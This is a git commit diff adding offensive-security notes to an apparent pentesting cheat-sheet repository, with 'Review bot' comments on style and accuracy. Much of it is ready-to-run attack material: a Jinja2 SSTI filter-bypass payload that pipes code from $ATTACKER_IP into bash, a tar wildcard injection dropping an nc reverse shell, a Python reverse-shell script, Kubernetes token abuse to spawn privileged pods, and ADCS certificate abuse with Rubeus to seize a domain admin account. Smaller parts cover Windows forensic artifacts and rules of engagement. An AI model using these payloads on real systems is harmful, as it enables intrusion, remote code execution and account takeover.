bump
parent 210ae2791c
commit d08a37a97d
@ -133,3 +133,6 @@
|
|||
[submodule "misc/static-binaries"]
|
||||
path = misc/static-binaries
|
||||
url = https://github.com/andrew-d/static-binaries.git
|
||||
[submodule "stego/stego-toolkit"]
|
||||
path = stego/stego-toolkit
|
||||
url = https://github.com/DominicBreuker/stego-toolkit.git
|
||||
|
|
|
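Review bot: the two new submodule entries carry no note on why `misc/static-binaries` and `stego/stego-toolkit` are vendored or at which upstream commit they were reviewed; third-party tool repositories pulled in as submodules are a supply-chain dependency of these notes, so a one-line comment per entry (purpose, reviewed at commit) would help. Only one `Subproject commit` gitlink is visible further down in this diff, so check that both submodules are actually pinned in this commit.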
@ -0,0 +1,37 @@
|
|||
# Kubectl
|
||||
|
||||
```sh
|
||||
kubectl get pods
|
||||
```
|
||||
* Check mounted secret
|
||||
```sh
|
||||
kubectl auth can-i --list
|
||||
kubectl get secrets
|
||||
kubectl get nodes
|
||||
kubectl get deployments
|
||||
kubectl get services
|
||||
kubectl get ingress
|
||||
kubectl get jobs
|
||||
```
|
||||
* Intel about a secret, and output
|
||||
```sh
|
||||
kubectl describe secrets <secret>
|
||||
kubectl describe secrets <secret> -o 'json'
|
||||
```
|
||||
## Abuse Token
|
||||
* Inside a pod the service token(jwt) can be found under `/var/run/secrets/kubernetes.io/serviceaccount/token`
|
||||
* By change of an LFI extract the token and
|
||||
```sh
|
||||
kubectl auth can-i --list --token=$TOKEN
|
||||
kubectl get pods --token=$TOKEN
|
||||
kubectl exec -it <pod name> --token=$TOKEN -- /bin/sh
|
||||
```
|
||||
|
||||
## Create Pods
|
||||
|
||||
* Use [BishopFox's BadPods](https://github.com/BishopFox/badPods.git)
|
||||
* If there is no internet connection add `imagePullPolicy: IfNotPresent` to the YAML file
|
||||
```sh
|
||||
kubectl apply -f pod.yml --token=$TOKEN
|
||||
kubectl exec -it everything-allowed-exec-pod --token=$TOKEN -- /bin/bash
|
||||
```
|
|
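Review bot: `kubectl describe secrets <secret> -o 'json'` does not work, `describe` has no `-o` flag; the JSON form is `kubectl get secret <secret> -o json`. Two smaller points: the bullet `By change of an LFI extract the token and` is cut off mid-sentence (and presumably means "by means of"), and the bullet `Check mounted secret` introduces a block that lists pods, nodes, deployments and services, so a heading like "Enumerate what the service account may read" would describe it better.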
@ -0,0 +1,11 @@
|
|||
# SNMP Enumeration
|
||||
|
||||
* Find community strings
|
||||
```sh
|
||||
onesixtyone $TARGET_IP -c /usr/share/seclists/Discovery/SNMP/snmp-onesixtyone.txt
|
||||
```
|
||||
* Query users
|
||||
```
|
||||
snmpwalk -v2c -c <community_string> $TARGET_IP 1.3.6.1.4.1.77.1.2.25
|
||||
```
|
||||
|
|
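Review bot: the `snmpwalk` fence is untagged while every other fence in these notes is ```sh; tag it for consistency. It would also help to label the OID: `1.3.6.1.4.1.77.1.2.25` is the Microsoft LanManager user table, so this walk only returns something on Windows hosts.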
@ -0,0 +1,11 @@
|
|||
# Netcat
|
||||
|
||||
* RX
|
||||
```sh
|
||||
nc -lp 8080 > out.txt
|
||||
```
|
||||
* TX
|
||||
```sh
|
||||
nc $ATTACKER_IP 8080 < in.txt
|
||||
```
|
||||
* Have to be end manually after a while
|
|
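Review bot: `Have to be end manually after a while` should read "has to be ended manually after a while", and the reason is worth a word: `nc` keeps the connection open after `in.txt` has been sent, so neither side exits on its own. Consistent placeholders would also help; the RX side is the host the TX side calls `$ATTACKER_IP`, so say so.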
@ -0,0 +1,6 @@
|
|||
# Evil-winrm
|
||||
|
||||
* Put the stuff to download into a writeable/readable directory like `C:\Windows\Temp`
|
||||
```sh
|
||||
download C:\Windows\Temp\<file>
|
||||
```
|
|
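Review bot: the fence is tagged ```sh, but `download` is an Evil-WinRM shell built-in rather than a system command, so the tag misleads. The bullet should also say where the file lands locally: Evil-WinRM's `download` takes an optional second argument for the local path and otherwise writes to the current directory. "Put the stuff to download" reads better as "put the file to download".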
@ -57,3 +57,8 @@ template = "User input is {{ input }}"
|
|||
return render_template_string(template, input=input)
|
||||
```
|
||||
|
||||
## Bypass
|
||||
* Save reverse shell as `rev`
|
||||
```sh
|
||||
{{request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fimport\x5f\x5f")("os")|attr("popen")("curl $ATTACKER_IP:8000/rev | bash")|attr("read")()}}
|
||||
```
|
||||
|
|
|
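Review bot: the heading `Bypass` does not say what is bypassed; the `attr()` chain with `\x5f\x5f` (i.e. `__`) escapes exists to get past filters that block `__`, `.` and `[` in the template input, and a one-line note on that makes the block reviewable instead of a copy-paste blob. The fence is tagged ```sh although the content is a Jinja2 expression, and the bullet `Save reverse shell as rev` should state that `rev` is what the `curl $ATTACKER_IP:8000/rev` inside the payload fetches.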
@ -5,6 +5,12 @@
|
|||
|
||||
* cronjob gets backup data from `/var/www/html` via `tar cf backup.tar *`. The reverse shell and the parameters need to be files in this directory to get called by tar and be executed.
|
||||
|
||||
```sh
|
||||
echo "mkfifo /tmp/oytqnhq; nc <IP> <PORT> 0</tmp/oytqnhq | /bin/sh >/tmp/oytqnhq 2>&1; rm /tmp/oytqnhq" > shell.sh
|
||||
echo "" > "--checkpoint-action=exec=sh shell.sh"
|
||||
echo "" > "--checkpoint=1"
|
||||
```
|
||||
or
|
||||
```sh
|
||||
echo "mkfifo /tmp/oytqnhq; nc <IP> <PORT> 0</tmp/oytqnhq | /bin/sh >/tmp/oytqnhq 2>&1; rm /tmp/oytqnhq" > /var/www/html/shell.sh
|
||||
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
|
||||
|
|
|
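Review bot: the second ```sh fence (the `or` variant) is never closed, so everything after it renders as code. The two variants also differ in more than the path: the first creates both the `--checkpoint=1` and the `--checkpoint-action=...` files, the second creates only the action file, so either add the missing file or say why it is not needed. Placeholders `<IP> <PORT>` should follow the `$ATTACKER_IP` convention used in the other notes, and the hard-coded `/tmp/oytqnhq` fifo name deserves a comment that it is arbitrary.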
@ -0,0 +1,48 @@
|
|||
# NTFS
|
||||
|
||||
* Has the following advantages over FAT
|
||||
* Journaling
|
||||
* ACL
|
||||
* Volume Shadow Copy
|
||||
* Alternate Data Stream
|
||||
|
||||
## Master File Table
|
||||
* VBR references to `$MFT`
|
||||
* `$LOGFILE` stores transactions of the file system
|
||||
* `$UsnJrnl` changed files, and reason for change
|
||||
|
||||
## Caching
|
||||
|
||||
* File information is cached for frequent use in
|
||||
```sh
|
||||
C:\Windows\Prefetch\*.pf
|
||||
```
|
||||
* An SQLite database can be found under
|
||||
```sh
|
||||
C:\Users\<username>\AppData\Local\ConnectedDevicesPlatform\{randomfolder}\ActivitiesCache.db
|
||||
```
|
||||
|
||||
## Jumplist
|
||||
|
||||
* Stores recently used files of applications inside the taskbar
|
||||
```sh
|
||||
C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations
|
||||
```
|
||||
|
||||
## Shortcut Files
|
||||
```sh
|
||||
C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Recent\
|
||||
C:\Users\<username>\AppData\Roaming\Microsoft\Office\Recent\
|
||||
```
|
||||
|
||||
## Internet Explorer History
|
||||
```sh
|
||||
C:\Users\<username>\AppData\Local\Microsoft\Windows\WebCache\WebCacheV*.dat
|
||||
```
|
||||
|
||||
## Removeable Device Setup Log
|
||||
```sh
|
||||
C:\Windows\inf\setupapi.dev.log
|
||||
```
|
||||
|
||||
|
|
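Review bot: most of this file is not about NTFS: Prefetch, `ActivitiesCache.db`, Jump Lists, shortcut files, `WebCacheV*.dat` and `setupapi.dev.log` are Windows OS artifacts that exist regardless of the file system, so either retitle the note (Windows forensic artifacts) or split them out from the `$MFT`/`$LOGFILE`/`$UsnJrnl` material. Typos: `Removeable` should be `Removable`, and `VBR references to $MFT` reads better as "the VBR points to `$MFT`". Also `{randomfolder}` under `ConnectedDevicesPlatform` is an account-specific folder, so the placeholder name is misleading.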
@ -0,0 +1,50 @@
|
|||
## Active Directory Certificate Service ADCS
|
||||
|
||||
* Internal CA
|
||||
* PKI
|
||||
* File system encryption
|
||||
* Digital signatures
|
||||
* User authentication
|
||||
|
||||
* __Certificates will not be revoked after account password reset__
|
||||
|
||||
## Certificate Templates
|
||||
|
||||
* Extended/Enhanced Key Usage
|
||||
* Parameter combination can be exploited
|
||||
|
||||
### Enumeration
|
||||
|
||||
* [PSPKIAudit](https://github.com/GhostPack/PSPKIAudit)
|
||||
|
||||
```sh
|
||||
certutil -v -template > ct.txt
|
||||
```
|
||||
|
||||
Exploitable templates should have the following traits:
|
||||
* `Allow Enroll` or `Allow Full Control` permissions to request certificate
|
||||
* Find groups by `net user <username> /domain` --> `Domain Users`, `Domain Computers`
|
||||
* Client authentication EKU for Kerberos authentication --> `Client Authentication`
|
||||
* Permission to subject alternative name (SAN), e.g. URL to encrypt. Used to create Kerberos ticket, --> `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT`
|
||||
|
||||
### Certificate Creation
|
||||
|
||||
* `Win+R` --> `mmc` --> `File` --> `Add/Remove Snap-in` --> `Certificates` (Request Certificate if administration account --> Computer Account)
|
||||
* After that in the main menu, `Certificates` --> right click on `Personal` --> `All Tasks` --> `Request Certificates` --> `Next` --> `Next` --> `More information is required to enroll this certificate` --> `Common Name` --> `CN=concerto` && `User Principal Name` is the user to impersonate --> `OK` --> select `User Request` --> `Enroll`
|
||||
* After that in the main menu, `Personal` --> `Certificates` --> __The certificate__
|
||||
* Right click certificate --> `All Tasks` --> `Export` --> `Yes, export private key` --> `PFX` --> set `Password` --> Save
|
||||
|
||||
### Impersonation
|
||||
|
||||
* Request TGT with the created cert
|
||||
* Grab TGT
|
||||
|
||||
* On the machine via
|
||||
```sh
|
||||
Rubeus.exe asktgt /user:<user (UPN) of cert> /enctype:aes256 /certificate:<path to certificate> /password:<certificate file password> /outfile:<name of file to write TGT to> /domain:<domain name> /dc:<IP of domain controller>
|
||||
```
|
||||
* Select a domain admin via opening `Active Directory Users and Computers`
|
||||
```sh
|
||||
.\Rubeus.exe changepw /ticket:<ticketfilename> /new:<new password> /dc:<domain of controller> /targetuser:<domain>\<dauser>
|
||||
```
|
||||
* `runas /user:<domain>\<username of DA> cmd.exe`
|
|
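Review bot: placeholders are inconsistent within the hunk: the `asktgt` line uses `/dc:<IP of domain controller>` while `changepw` uses `/dc:<domain of controller>`; both name the domain controller, so use one placeholder. `CN=concerto` in the Certificate Creation steps is an unexplained literal (say it is an arbitrary common name or make it a placeholder), and "Permission to subject alternative name (SAN), e.g. URL to encrypt" garbles the point: the trait is that the enrollee may supply the subject/SAN (`CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT`), which is what lets a requester put another user's UPN into the certificate. The bolded bullet that certificates are not revoked on password reset is the key defensive point and should say what follows from it: when an account is compromised, its issued certificates must be revoked explicitly, since the certificate stays valid until expiry otherwise.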
@ -1,10 +1,21 @@
|
|||
# Pentesting
|
||||
* [Pentesting Execution Standard](http://www.pentest-standard.org/index.php/Main_Page)
|
||||
Authorized audit of security systems of computers and networks.
|
||||
* [Rules of Engagement -- Cheat Sheet](https://sansorg.egnyte.com/dl/bF4I3yCcnt/?)
|
||||
* [Rules of Engagement -- Cheat Sheet](https://sansorg.egnyte.com/dl/bF4I3yCcnt/?) and [redteam.guide ROEs](https://redteam.guide/docs/templates/roe_template/)
|
||||
* Permissions
|
||||
* Scope
|
||||
* Engagement --> internal/external pentest or adversary emulation of APTs
|
||||
* Scope --> networks, IPs, exfilration of data, which stage, downtime, DDoS
|
||||
* Rules
|
||||
* NDA
|
||||
|
||||
## Campaign
|
||||
* [Checklist](https://redteam.guide/docs/checklists/red-team-checklist/)
|
||||
* [vectr.io](https://vectr.io)
|
||||
|
||||
* Engagement --> Concept of Operations (CONOPS), Resource and Personnel Requirements, Timelines
|
||||
* Operations --> Operators, Known Information, Responsibilities
|
||||
* Mission --> Exact commands to run and execution time of the engagement
|
||||
* Remediation --> Report, Remediation consultation
|
||||
|
||||
## Methodology
|
||||
|
||||
|
|
|
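Review bot: `exfilration` in the Scope line should be `exfiltration`. The new `## Methodology` heading is added with nothing under it (the hunk ends in blank lines), so either fill it or leave the heading for the commit that adds the content. The replaced Rules of Engagement line is fine, but the two nested `Scope` bullets (one under Permissions, one with the network/IP list) now read as duplicates; merging them would make the list clearer.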
@ -0,0 +1,10 @@
|
|||
import os
|
||||
import socket
|
||||
import subprocess
|
||||
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect(("#Target", 3000))
|
||||
os.dup2(s.fileno(), 0)
|
||||
os.dup2(s.fileno(), 1)
|
||||
os.dup2(s.fileno(), 2)
|
||||
import pty;pty.spawn("/bin/bash")
|
|
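Review bot: the `"#Target"` placeholder is misleading: the script connects back to the listening host, which the rest of these notes call `$ATTACKER_IP`, not to the target. `import subprocess` is unused and can be dropped, and `import pty;pty.spawn("/bin/bash")` should be split into two lines with the import at the top next to the others.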
@ -0,0 +1 @@
|
|||
Subproject commit 4e6c2daf5ce08dfdbb9f9711f92f686eee3a6348
|
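Review bot: `.gitmodules` in this commit declares two submodules but only one `Subproject commit` gitlink appears in the diff; confirm the second submodule's gitlink is committed as well so both checkouts are pinned to a reviewed revision rather than floating.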